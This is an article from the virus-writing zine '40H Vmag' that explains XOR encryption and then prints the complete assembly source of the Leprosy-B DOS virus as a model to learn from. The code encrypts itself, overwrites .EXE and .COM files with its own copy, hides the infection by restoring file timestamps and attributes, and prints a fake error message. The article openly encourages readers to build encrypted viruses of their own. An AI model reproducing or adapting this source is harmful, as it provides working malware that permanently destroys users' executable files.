40H Vmag Issue 1 Volume 1 00004 - SIMPLE ENCRYPTION METHODS - Encryption is perhaps one of the key parts of writing a virus. If you have a virus that prints a message to the screen, you don't want infected files to contain that message. One easy way to encrypt data is the XOR method. XOR is a matamatical function that can be used to cifer and decifer data with the same key. Example -- FF xor A1 = 5E byte to encrypt^ ^key ^result and likewise 5E xor A1 = FF So as you can see an easy way to encrypt/decrypt sensitve data is with the XOR function. A popular virus that demonstrates this teqnique is Leprosy-B. By studing the below example you are on the way to make simple encrypted viruses. ------------------------------------------------------------------------------ ; - Leprosy-B Virus Source ; Copy-ya-right (c) 1990 by PCM2. ; ; This file is the source code to the Leprosy-B virus. It should ; be assembled with an MASM-compatible assembler; it has been tested ; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0. ; It should be made into a .COM file before executing, with either ; the "/t" command line flag in TLINK or Microsoft's EXE2BIN utility. ; ; This program has the potential to permanently destroy executable ; images on any disk medium. Other modifications may have been made ; subsequent to the original release by the author, either benign, ; or which could result in further harm should this program be run. ; In any case, the author assumes no responsibility for any damage ; caused by this program, incidental or otherwise. As a precaution, ; this program should not be turned over to irresponsible hands... ; (unlike people like us, that is). title "Leprosy-B Virus by PCM2, August 1990" cr equ 13 ; Carriage return ASCII code lf equ 10 ; Linefeed ASCII code tab equ 9 ; Tab ASCII code virus_size equ 666 ; Size of the virus file code_start equ 100h ; Address right after PSP in memory dta equ 80h ; Addr of default disk transfer area datestamp equ 24 ; Offset in DTA of file's date stamp timestamp equ 22 ; Offset in DTA of file's time stamp filename equ 30 ; Offset in DTA of ASCIIZ filename attribute equ 21 ; Offset in DTA of file attribute code segment 'code' ; Open code segment assume cs:code,ds:code ; One segment for both code & data org code_start ; Start code image after PSP ;--------------------------------------------------------------------- ; All executable code is contained in boundaries of procedure "main". ; The following code, until the start of "virus_code", is the non- ; encrypted CMT portion of the code to load up the real program. ;--------------------------------------------------------------------- main proc near ; Code execution begins here call encrypt_decrypt ; Decrypt the real virus code jmp random_mutation ; Put the virus into action encrypt_val db 00h ; Hold value to encrypt by here ; ---------- Encrypt, save, and restore the virus code ----------- infect_file: mov bx,handle ; Get the handle push bx ; Save it on the stack call encrypt_decrypt ; Encrypt most of the code pop bx ; Get back the handle mov cx,virus_size ; Total number of bytes to write mov dx,code_start ; Buffer where code starts in memory mov ah,40h ; DOS write-to-handle service int 21h ; Write the virus code into the file call encrypt_decrypt ; Restore the code as it was ret ; Go back to where you came from ; --------------- Encrypt or decrypt the virus code ---------------- encrypt_decrypt: mov bx,offset virus_code ; Get address to start encrypt/decrypt xor_loop: ; Start cycle here mov ah,[bx] ; Get the current byte xor ah,encrypt_val ; Engage/disengage XOR scheme on it mov [bx],ah ; Put it back where we got it inc bx ; Move BX ahead a byte cmp bx,offset virus_code+virus_size ; Are we at the end? jle xor_loop ; If not, do another cycle ret ; and go back where we came from ;----------------------------------------------------------------------- ; The rest of the code from here on remains encrypted until run-time, ; using a fundamental XOR technique that changes via CMT. ;----------------------------------------------------------------------- virus_code: ;---------------------------------------------------------------------------- ; All strings are kept here in the file, and automatically encrypted. ; Please don't be a lamer and change the strings and say you wrote a virus. ; Because of Cybernetic Mutation Technology(tm), the CRC of this file often ; changes, even when the strings stay the same. ;---------------------------------------------------------------------------- exe_filespec db "*.EXE",0 com_filespec db "*.COM",0 newdir db "..",0 fake_msg db cr,lf,"Program too big to fit in memory$" virus_msg1 db cr,lf,tab,"ATTENTION! Your computer has been afflicted with$" virus_msg2 db cr,lf,tab,"the incurable decay that is the fate wrought by$" virus_msg3 db cr,lf,tab,"Leprosy Strain B, a virus employing Cybernetic$" virus_msg4 db cr,lf,tab,"Mutation Technology(tm) and invented by PCM2 08/90.$" compare_buf db 20 dup (?) ; Buffer to compare files in files_found db ? files_infected db ? orig_time dw ? orig_date dw ? orig_attr dw ? handle dw ? success db ? random_mutation: ; First decide if virus is to mutate mov ah,2ch ; Set up DOS function to get time int 21h cmp encrypt_val,0 ; Is this a first-run virus copy? je install_val ; If so, install whatever you get. cmp dh,15 ; Is it less than 16 seconds? jg find_extension ; If not, don't mutate this time install_val: cmp dl,0 ; Will we be encrypting using zero? je random_mutation ; If so, get a new value. mov encrypt_val,dl ; Otherwise, save the new value find_extension: ; Locate file w/ valid extension mov files_found,0 ; Count infected files found mov files_infected,4 ; BX counts file infected so far mov success,0 find_exe: mov cx,00100111b ; Look for all flat file attributes mov dx,offset exe_filespec ; Check for .EXE extension first mov ah,4eh ; Call DOS find first service int 21h cmp ax,12h ; Are no files found? je find_com ; If not, nothing more to do call find_healthy ; Otherwise, try to find healthy .EXE find_com: mov cx,00100111b ; Look for all flat file attributes mov dx,offset com_filespec ; Check for .COM extension now mov ah,4eh ; Call DOS find first service int 21h cmp ax,12h ; Are no files found? je chdir ; If not, step back a directory call find_healthy ; Otherwise, try to find healthy .COM chdir: ; Routine to step back one level mov dx,offset newdir ; Load DX with address of pathname mov ah,3bh ; Change directory DOS service int 21h dec files_infected ; This counts as infecting a file jnz find_exe ; If we're still rolling, find another jmp exit_virus ; Otherwise let's pack it up find_healthy: mov bx,dta ; Point BX to address of DTA mov ax,[bx]+attribute ; Get the current file's attribute mov orig_attr,ax ; Save it mov ax,[bx]+timestamp ; Get the current file's time stamp mov orig_time,ax ; Save it mov ax,[bx]+datestamp ; Get the current file's data stamp mov orig_date,ax ; Save it mov dx,dta+filename ; Get the filename to change attribute mov cx,0 ; Clear all attribute bytes mov al,1 ; Set attribute sub-function mov ah,43h ; Call DOS service to do it int 21h mov al,2 ; Set up to open handle for read/write mov ah,3dh ; Open file handle DOS service int 21h mov handle,ax ; Save the file handle mov bx,ax ; Transfer the handle to BX for read mov cx,20 ; Read in the top 20 bytes of file mov dx,offset compare_buf ; Use the small buffer up top mov ah,3fh ; DOS read-from-handle service int 21h mov bx,offset compare_buf ; Adjust the encryption value mov ah,encrypt_val ; for accurate comparison mov [bx+6],ah mov si,code_start ; One array to compare is this file mov di,offset compare_buf ; The other array is the buffer mov ax,ds ; Transfer the DS register... mov es,ax ; ...to the ES register cld repe cmpsb ; Compare the buffer to the virus jne healthy ; If different, the file is healthy! call close_file ; Close it up otherwise inc files_found ; Chalk up another fucked up file continue_search: mov ah,4fh ; Find next DOS function int 21h ; Try to find another same type file cmp ax,12h ; Are there any more files? je no_more_found ; If not, get outta here jmp find_healthy ; If so, try the process on this one! no_more_found: ret ; Go back to where we came from healthy: mov bx,handle ; Get the file handle mov ah,3eh ; Close it for now int 21h mov ah,3dh ; Open it again, to reset it mov dx,dta+filename mov al,2 int 21h mov handle,ax ; Save the handle again call infect_file ; Infect the healthy file call close_file ; Close down this operation inc success ; Indicate we did something this time dec files_infected ; Scratch off another file on agenda jz exit_virus ; If we're through, terminate jmp continue_search ; Otherwise, try another ret close_file: mov bx,handle ; Get the file handle off the stack mov cx,orig_time ; Get the date stamp mov dx,orig_date ; Get the time stamp mov al,1 ; Set file date/time sub-service mov ah,57h ; Get/Set file date and time service int 21h ; Call DOS mov bx,handle mov ah,3eh ; Close handle DOS service int 21h mov cx,orig_attr ; Get the file's original attribute mov al,1 ; Instruct DOS to put it back there mov dx,dta+filename ; Feed it the filename mov ah,43h ; Call DOS int 21h ret exit_virus: cmp files_found,6 ; Are at least 6 files infected? jl print_fake ; If not, keep a low profile cmp success,0 ; Did we infect anything? jg print_fake ; If so, cover it up mov ah,09h ; Use DOS print string service mov dx,offset virus_msg1 ; Load the address of the first line int 21h ; Print it mov dx,offset virus_msg2 ; Load the second line int 21h ; (etc) mov dx,offset virus_msg3 int 21h mov dx,offset virus_msg4 int 21h jmp terminate print_fake: mov ah,09h ; Use DOS to print fake error message mov dx,offset fake_msg int 21h terminate: mov ah,4ch ; DOS terminate process function int 21h ; Call DOS to get out of this program filler db 8 dup (90h) ; Pad out the file length to 666 bytes main endp code ends end main ------------------------------------------------------------------------------ While the virus is no great wonder the simple encryption method is what is used by almost all viruses. HR